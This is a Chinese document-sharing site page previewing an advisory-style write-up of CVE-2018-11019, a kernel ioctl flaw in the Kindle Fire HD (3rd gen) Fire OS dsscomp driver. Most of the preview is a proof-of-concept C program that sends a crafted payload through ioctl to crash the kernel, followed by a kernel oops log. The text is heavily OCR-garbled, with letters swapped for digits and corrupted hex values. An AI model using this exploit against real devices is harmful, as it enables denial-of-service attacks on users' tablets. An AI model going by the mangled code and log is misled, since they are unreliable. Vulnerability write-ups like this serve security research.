（CVE-2018-11019）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

资源ID：794836 资源大小：81.13KB 全文页数：10页
资源格式： DOCX 下载积分：3金币

快捷下载

账号登录下载

微信登录下载

三方登录下载：

扫码关注公众号登录

下载资源需要3金币

邮箱/手机：
温馨提示：	快捷下载时，用户名和密码都是您填写的邮箱或者手机号，方便查询和重复下载（系统自动生成）。如填写123，账号就是123，密码也是123。
支付方式：
验证码：	换一换

加入VIP,免费下载

账号：
密码：
验证码：	换一换
当日自动登录忘记密码？

友情提示

1、下载资料失败解决办法

2、PDF文件下载后，可能会被浏览器默认打开，此种情况可以点击浏览器菜单，保存网页到桌面，就可以正常下载了。

3、本站不支持迅雷下载，请使用电脑自带的IE浏览器，或者360浏览器、谷歌浏览器下载即可。

4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩，下载后原文更清晰。

5、试题试卷类文档，如果标题没有明确说明有答案则都视为没有答案，请知晓。

网站客服

侵权投诉

（CVE-2018-11019）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

(CVE-2018-11019)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)是美国亚马逊(AmaZOn)公司的一款FireOS平板电脑设备。FireOS是运行在其中的一套专用于AmaZOn设备的基于Android开发的移动操作系统。kerne1是其中的一个内核组件。AmazonKind1eFireHD(3rd)FireOS4.5.5.3版本中的kerne1组件的kerne1/omap/drivers/misc/gcx/gcioct1/gcif.c文件存在安全漏洞。攻击者可借助3221773726命令利用该漏洞注入特制的参数，造成内核崩溃。二、漏洞影响FireOS4.5.5.3三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevdsscompcausesthesystemcrashviaIOCT11118064517.* Re1atedbuggystructnameisdsscomp_setup_dispc_data.* ThisPocshou1drunwithpermissiontodoioct1ondevdsscomp.* The-Fow11wingiskmsgofkerne1crashinfomation:*/#inc1ude<stdio.h>#inc1ude<fcnt1.h>#inc1ude<errno.h>#inc1ude<sysioct1.h>conststaticchar*driver="devdsscomp"staticcommand=1118064517;intmain(intargc,char*argv,char*env)unsignedintpay1oad=Oxffffffffj0X00000003j0×5d200040,0x79900008,0x8f5928bd,0x78b02422,0X00000000j0ffffffff,0xf4c50400,0×007fffff,08499f562,0×ffff0400,0×001b131dj0x60818210,0X00000007,0×ffffffff,0X000000000x9da9041c,0×cd980400,0×001f03f4,0x00000007,0x2a34003f,0×7c80d8f3,0x63102627,0xc73643a8,0xa28f0665,0X00000000j0×689e57b4j0x01ff0008,0x5e7324b1,0xae3b003f,0x0b174d86,0X00000400,0x2Iffff37,0xceb367a4j0x00000040,0x00000001j0xec000f9ej0×00000001,0x00000Iff,0X00000000,0×00000000,0×0000000f0×0425c069j0x038cc3bej0×0000000f,0x00000080,0xe5790100,0×5b1bffff,0×0000d355,0x0000c685,0xa0070000,0×0010ffff,0x00a0ff00,0×00000001,0xff490700j0x0832ad03,0x000000060X00000002,0×00000001j0x81f871C0,0x738019cbj0xbf47ffff,0×00000040j0X00000001,x7f190f33,0X00000001,0x8295769b,0X0000003f,0x869f2295,0×ffffffffj0xd673914fj0x05055800,0xed69b7d5j0X00000000,0x107ebbd,0xd214af8dj0xffff4a93,0x26450008,0x58df0000j0×d16db084j0x03ff30dd,0X00000001,0x209aff3b,0xe7850800j0x00000002,0x30da815cj0x426f5105,0×0de109d7j0×2c1a65fcj0×fcb3d75f,0X00000000,0X00000001,0×8066be5b0X00000002,0×ffffffffj0x5cf232ecj0x680d1469,0X000000010X00000020,0×ffffffff,0X00000400,0xd1d12be8j0X02010200,0×01ffc16f,0xf6e237e6,0x007f0000,0×01ff08f8,0×000f00f9j0xbad07695,0X00000000j0xbaff0000,0x24040040,0X000000060X00000004,0X00000000,0xbc2e9242,0x009f5f08,0x00800000?0X00000000j0×00000001,0xff8800ff,0X00000001,0X00000000,0×000003f4,0x6faa8472,0X00000400j0×ec857dd5,0x00000000,0x00000040,0xffffffff,0x3f004874,0x0000b77a,0xec9acb95,0xfacc00010xffff0001,0×0080ffff,0x3600ff03,0×00000001,0x8fff7d7f,0x6b87075a,0X00000000,0X41414141,0×41414141j0×41414141,0x41414141,0X00100Iff,0X00000000j0X00000001j0×ff1f0512,0X00000001j0x51e32167,0xc18c55ccj0X00000000?0xffffffff,0xb4aaf12b0x86edfdbd,0X00000010,0×0000003fj0×abff7b00,0xffff9ea3j0xb28e0040,0x000fffff,0x458603f4,0×ffff007f,0xa9030f02,0X00000001j0x002Cffff,0×9e00cdffj0×00000004j0×41414141,0×41414141,0x41414141,0x41414141；intfd=0;fd=open(driverjO_RDWR);if(fd<0)printf("Fai1edtoopen%sjwitherrno%dn”,driverjerrno);system(',echo1>data1oca1tmp1og");return-1;)printf("Tryopen%swithcommand0x%x.n”,driver,command);printf("Systemwi11crashandreboot.n");if(ioct1(fdjcommand,Spay1oad)<0)printf("A11ocationofstructsfai1ed,%dr,errno);system("echo2>data1oca1tmp1og");return-1;c1ose(fd);return0;崩溃日志164.793151Unab1etohand1ekerne1NU11pointerdereferenceatvirtua1address00000037164.802459164.805664164.813415164.819458164.8272391)164.834686164.839416pgd=c26ec00000000037*pgd=82f42831,*pte=00000000j*ppte=00000000Interna1error:Oops:17#1PREEMPTSMPARMModu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1ogger(0)CPU:1Tainted:GO(3.4.83-gd2afc0bae69#PCisat1Risatdev-ioct1+0×4ac0x10c4down_timeout+0x40/0x5c164.844146164.844146164.857116164.8631280f164.87039100PC:SP:0:r7:r3:<c03178e8>c25a1e7000000000C0a25b5000001403Ir:<c006e9b8>psr:60000013iPr9r6:c25a1e50:d8caca8:c25a0000：00000000164.877807F1ags:nZCvIRQsonmentuserfp:c25a1f04r8:bed5c610r5:bed5c610r4:000000r1:20000013r0:000000FIQsonModeSVC_32ISAARMSeg164.885894Contro1:10c5387dTab1e:826ec04aDAC:00000015164.892303164.892333PC:0xc0317868:164.897308786830d22003f02e1a0200de3c26d7f33a03000e35300000a0001c5e3e0500deafff164.9079897888e3c6603f0001a000021e24b3064e5963008e295200830d2200333a03000e3530164.91867078a8e1a010050001a00001ee51b4060e3a02008e50b3088e1a00003ebfcfa5fe3500164.92935178c8e3020710c25e3500000Ia0002e0e59f7bdcebf4db32e1a010002870038ebf55164.93988078e8e5943028004e5830000e5b23070e1a08000e5940024e1a02007e2841024e5803164.9505617908e5871070bb9e50b8060e50b8064e2420038e5831004e5843024e5842028ebf55164.9612127928ea000006387e3a03004e50b3064e24b1064e50b1088e51b0088e3a01008ebfd0164.9717717948e5963008fc5e1a00005e51b1088e295200830d2200333a03000e3530000Iafff164.982299164.9823301R:0xc006e938:164.987426e938e1a01000004eb18d7ade1a000050a000007e3a05000e2433001e5843008e1a00164.997955e958e24bd014018e1a05

注意事项

本文（（CVE-2018-11019）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx）为本站会员（lao****ou）主动上传，第一文库网仅提供信息存储空间，仅对用户上传内容的表现方式做保护处理，对上载内容本身不做任何修改或编辑。若此文所含内容侵犯了您的版权或隐私，请立即通知第一文库网（点击联系客服），我们立即给予删除！

温馨提示：如果因为网速或其他原因下载失败请重新下载，重复下载不扣分。